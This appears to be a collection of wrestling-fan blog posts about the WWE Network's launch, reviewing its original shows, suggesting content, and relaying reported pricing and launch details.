Wrestlemania Gets Over 1,000,000 Views

That was the plan, and it’s not even taking international buys into account yet. That’s a VERY good result for WWE.

Sorry For The Lack Of Updates Today/WWE Network Original Shows

Instead I just kind of watched stuff on the Network all day so I figured I’d give my thoughts on its original series so far since I somehow haven’t this far into the launch.Wrestlemania Rewind – I like the concept here but there’s only a certain amount of episodes they can air. However, they can switch it up to various versions such as Summerslam, Royal Rumble etc or even the lower shows like MITB. It’s a cool concept and it comes back to the best thing the WWE Network has going for it: they can air whatever they want and they have all the time they want to do so. It’s cool for a flashback and a great way to get people ready for Wrestlemania. Airing the match is another nice touch.

Beyond the Ring – Not really original but it’s a really smart move. Those documentaries can rock and they have like a million of them to air so far with more coming out every year. They’re long so I wouldn’t recommend starting one unless you have a lot of time on your hands.

Legends of Wrestling – Maybe my favorite show they have, even though a lot of them are old. I love listening to the legends telling stories for an hour on any given topic as there’s a very natural feeling to the idea. It works so well but some of the panel members are just awful choices, like Mike Graham who just isn’t relevant to anything outside of “The Mike Graham Story.”

Countdown – I thought this was going to be a really generic show but I’m digging the heck out of it so far. There are hundreds of ideas you could do for this show and it could go on for a long time. Some of the choices have actually surprised me and the whole thing is far better than it should be. THe talking heads help a lot and the mini features they throw in are great too. For example there’s an episode about entrances and they throw in a retrospective about ring robes. That’s awesome stuff for old school fans like myself and it allows for a lot of debate after it’s over.

Shockingly enough I’m loving most of these shows which are all bonus material to the huge library and all the regular programming you get as well. The Network is everything I was hoping it would be and it’s just awesome so far. I can’t wait for them to add even more content as they could keep putting out new stuff for years.

Things You Want To See On The WWE Network

Here are a few ideas of mine.1. A commentary show.

As in you air matches with the wrestlers offering their own commentary on them like a director’s commentary on a DVD. I’ve seen a few of these before and they’re rather interesting at times.

2. Coliseum Video.

For you younguns, Coliseum Video was the official home video distributor for the WWF back in the 90s. They had a ton of tapes with some great stuff hidden in there, ranging from Smack Em Whack Em (BRet vs. Flair for the title and the first ladder match) to a 20 volume series called Best of the WWF to a 5 volume Hulk Hogan series, the third of which is as good of a home video as they ever released.

3. ECW specials.

Before they were on PPV, ECW’s big market was in home video with specials. I’m not a fan, but a lot of those are hard to find and have some of their bigger moments included. Throw that stuff out there.

4. Compilations you won’t see anywhere else.

Remember the Best of Braden Walker DVD ad? Actually do stuff like that. Throw out a Best of Curt Hawkins show or The Life and Times of Hornswoggle. Be creative and over the top with it to the point that it’s fun.

ECW is now added and you even get the three WWECW PPVs as bonuses. That’s a nice touch that I didn’t expect but am glad to see. I’m planning on doing an ECW PPV E-Book in the future and those things are hard to find in complete form.

Greed (the company was out of business two months after Greed aired) and SuperBrawl IV (never heard a concrete reason) were never released on home video by WCW so it’s something nice for people who like completeness to have available for the first time ever. Starrcade 1983-1986 weren’t PPVs at all but they’re shows you have to put into something like this.

The Big Event and the Wrestling Classic are completely forgotten one off PPVs that didn’t mean anything but are nice additions. Actually the first Wrestlemania wasn’t a PPV (mostly) but you know that wasn’t getting left out. The interesting show here is Over the Edge, which was never commercially released and is a hard show to track down. On a lighter note, I’m very happy that Survivor Series 1989 is there (presumably) in complete form. The VHS was hacked to death and cuts nearly an hour of match time off the show and I wasn’t shilling out 50 bucks for the Anthology collection.

As has been said since the launch was announced, TAKE MY MONEY NOW.

Be it the App, whatever TV show they’re hyping up or any product of the week, you’re going to hear about it every five minutes at worst. Here’s the thing: that’s a very smart move and exactly what WWE should be doing. As annoying as it is to fans who watch all the time, I would be shocked if any regular viewer of WWE programing couldn’t rattle off complete details of whatever WWE is hyping at the moment.

On the other hand, look at TNA. How many things have they had (Video Vault, Xplosion etc) that were never talked about? Those are ideas that could bring in revenue to the company but instead we’re treated to Tenay and Tazz being “witty.” WWE pounds ideas into our heads and it’s a big reason why they’re as big as they are.

Justin LaBar of WrestleZone.com is reporting that WWE has a targeted launch date of February 24th for the WWE Network, which is the day after the Elimination Chamber pay-per-view. This confirms a previous report from PWInsider.com, but LaBar’s sources provided him with a few extra tidbits about the Network:

– Initial price point will be in the $10-$12 a month range, with the sign-up being for six months.

– You’ll be able to watch WrestleMania 30 on the Network, with the plan still being the reported “every non-WrestleMania pay-per-view airing on the Network in the future”.

– It won’t be a channel on television, but an app-like service along the lines of Netflix that you’ll be able to watch online and on devices like smart TVs, PS3, PS4, X-Box 360, X-Box one, and so on.

– There will be a live, 24/7 stream of content on the Network, which is the thing that will separate it from apps like Netflix, which focuses more on-demand viewing. However, on-demand viewing will still be a part of the Network, as the entire library of Raw and Smackdown episodes, as well as pay-per-views, will be available to watch at launch.

I’m glad it’s not a TV network, though the idea of WWE streaming this stuff could be a MAJOR problem. I’ll pick it up of course, but that six month idea scares me a bit.
